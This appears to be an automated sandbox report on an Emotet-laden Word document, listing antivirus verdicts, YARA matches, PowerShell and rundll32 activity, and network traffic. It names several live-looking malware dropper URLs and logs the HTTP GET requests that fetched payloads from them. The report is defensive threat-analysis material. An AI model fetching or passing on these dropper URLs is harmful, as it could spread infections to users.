AV Detection:

Antivirus detection for URL or domain

Source: https://fifacoinsbox.com/wp-content/7gYt/	Avira URL Cloud: Label: malware
Source: http://yourcleanersurfaces.com/four-monks-acasz/O2my/	Avira URL Cloud: Label: malware
Source: http://www.91yudao.com/wp-admin/KKHt1/	Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/	Avira URL Cloud: Label: malware
Source: https://rbdck.com/wp-content/uploads/sucuri/lewfK/	Avira URL Cloud: Label: malware
Source: http://uagritech.com/cgi-bin/a5G/	Avira URL Cloud: Label: malware
Source: http://laymancoder.com/rustic-decor-1gbad/Us/	Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/P	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.91yudao.com	Virustotal: Detection: 7%			Perma Link
Source: yourcleanersurfaces.com	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: Mensaje-22-012021.doc	Virustotal: Detection: 61%	Perma Link
Source: Mensaje-22-012021.doc	Metadefender: Detection: 32%	Perma Link
Source: Mensaje-22-012021.doc	ReversingLabs: Detection: 62%

Antivirus or Machine Learning detection for unpacked file

Source: 24.2.rundll32.exe.10000000.0.unpack

Avira: Label: TR/Spy.Gen

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: uagritech.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
Source: global traffic	HTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
Source: global traffic	HTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: uagritech.com

Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://laymancoder.com/rustic-decor-1gbad/Us/
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://seamart.info/alfacgiapi/q92A/
Source: powershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmp	String found in binary or memory: http://seamart.info/alfacgiapi/q92A/P
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2170760587.000000001B54A000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com/cgi-bin/a5G/
Source: powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com/cgi-sys/suspendedpage.cgi
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://www.91yudao.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.91yudao.com/wp-admin/KKHt1/
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://yourcleanersurfaces.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://yourcleanersurfaces.com/four-monks-acasz/O2my/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://fifacoinsbox.com/wp-content/7gYt/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://rbdck.com/wp-content/uploads/sucuri/lewfK/
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

System Summary:

Very long command line found

Source: unknown	Process created: Commandline size = 5501
Source: unknown	Process created: Commandline size = 5400
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5400	Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
